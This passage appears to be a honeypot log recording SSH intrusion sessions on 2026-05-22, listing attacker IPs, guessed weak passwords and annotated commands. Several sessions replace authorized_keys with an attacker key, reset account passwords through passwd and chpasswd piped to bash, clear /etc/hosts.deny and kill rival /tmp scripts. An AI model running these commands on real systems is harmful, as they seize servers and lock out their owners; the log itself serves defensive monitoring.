$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\nFcrZyk77isQH\nFcrZyk77isQH"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\nFcrZyk77isQH\nFcrZyk77isQH\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "nokia123\nYVL9fnOpcuaN\nYVL9fnOpcuaN"|passwd|bash
$ echo "nokia123\nYVL9fnOpcuaN\nYVL9fnOpcuaN\n"|passwd
🎭 specter_root_74 (190.128.241.2) β€” Mariano Roque Alonso, Paraguay Β· 2 sessions Β· 40 cmds
2026-05-22 11:55 EDT Β· as helena/helena2024, mc/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\nOQwZokp3fHpH\nOQwZokp3fHpH"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\nOQwZokp3fHpH\nOQwZokp3fHpH\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "helena2024\nRIG5Qzrwj912\nRIG5Qzrwj912"|passwd|bash
$ echo "helena2024\nRIG5Qzrwj912\nRIG5Qzrwj912\n"|passwd
🎭 shadow_root_69 (58.186.20.143) β€” Ho Chi Minh City, Vietnam Β· 1 session Β· 19 cmds
2026-05-22 12:14 EDT Β· as root/@Admin2025
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:mxHMDEPu5FVI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stein_root_21 (165.232.71.249) β€” Frankfurt am Main, Germany Β· 2 sessions Β· 40 cmds
2026-05-22 11:58 EDT Β· as nokia/nokia123, tomcat/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "nokia123\ng9fUSG5pByWd\ng9fUSG5pByWd"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "nokia123\ng9fUSG5pByWd\ng9fUSG5pByWd\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123456\nDspLHTTYzs3y\nDspLHTTYzs3y"|passwd|bash
$ echo "123456\nDspLHTTYzs3y\nDspLHTTYzs3y\n"|passwd
🎭 pretzel_root_15 (138.124.73.129) β€” Frankfurt Am Main, Germany Β· 1 session Β· 20 cmds
2026-05-22 11:55 EDT Β· as mohammad/mohammad
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "mohammad\n5aKZrSi1gEo5\n5aKZrSi1gEo5"|passwd|bash
$ Enter new UNIX password:
$ echo "mohammad\n5aKZrSi1gEo5\n5aKZrSi1gEo5\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_24 (118.196.26.28) β€” Haidian, China Β· 1 session Β· 20 cmds
2026-05-22 11:50 EDT Β· as james/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nrf6nGky0Xh5u\nrf6nGky0Xh5u"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nrf6nGky0Xh5u\nrf6nGky0Xh5u\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ramen_sol (124.18.182.99) β€” Hamamatsu, Japan Β· 1 session Β· 20 cmds
2026-05-22 11:45 EDT Β· as mc/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nM1W9YDG7Hwxy\nM1W9YDG7Hwxy"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nM1W9YDG7Hwxy\nM1W9YDG7Hwxy\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_70 (170.254.229.191) β€” BogotΓ‘, Colombia Β· 2 sessions Β· 39 cmds
2026-05-22 11:18 EDT Β· as daemon/smoker666, root/Zc123456!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "smoker666\ntwVLncjdn6uP\ntwVLncjdn6uP"|passwd|bash
$ Enter new UNIX password:
$ echo "smoker666\ntwVLncjdn6uP\ntwVLncjdn6uP\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:0hn1CM2L4qKB"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 autobahn_root_14 (43.165.3.187) β€” Frankfurt am Main, Germany Β· 2 sessions Β· 39 cmds
2026-05-22 11:24 EDT Β· as daemon/smoker666, root/Zc123456!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "smoker666\nJFTUrg9qUUah\nJFTUrg9qUUah"|passwd|bash
$ Enter new UNIX password:
$ echo "smoker666\nJFTUrg9qUUah\nJFTUrg9qUUah\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:1Gn1TSKd2Pas"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 bistro_root_8 (54.37.229.48) β€” Roubaix, France Β· 2 sessions Β· 39 cmds
2026-05-22 11:19 EDT Β· as daemon/smoker666, root/Zc123456!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:HTU0IXyRTDmb"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "smoker666\ncO8PlaBmON1w\ncO8PlaBmON1w"|passwd|bash
$ Enter new UNIX password:
$ echo "smoker666\ncO8PlaBmON1w\ncO8PlaBmON1w\n"|passwd
🎭 acai_root_6 (187.0.238.72) β€” Atibaia, Brazil Β· 1 session Β· 19 cmds
2026-05-22 11:05 EDT Β· as root/14521452
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:FYnJi54jKGSO"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 hanbok_root_12 (211.170.168.202) β€” Gangnam-gu, South Korea Β· 1 session Β· 19 cmds
2026-05-22 09:45 EDT Β· as root/123456Zx
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Xnv3mdOkAwIW"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_82 (102.88.137.145) β€” Lagos, Nigeria Β· 2 sessions Β· 39 cmds
2026-05-22 08:35 EDT Β· as root/321321321, shyam/shyam
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "shyam\n0Ehq25zxZl7h\n0Ehq25zxZl7h"|passwd|bash
$ Enter new UNIX password:
$ echo "shyam\n0Ehq25zxZl7h\n0Ehq25zxZl7h\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:TxPGIQvbDiKK"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 yankee_root_10 (13.90.206.6) β€” Boydton, United States Β· 1 session Β· 20 cmds
2026-05-22 09:24 EDT Β· as test/1111
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
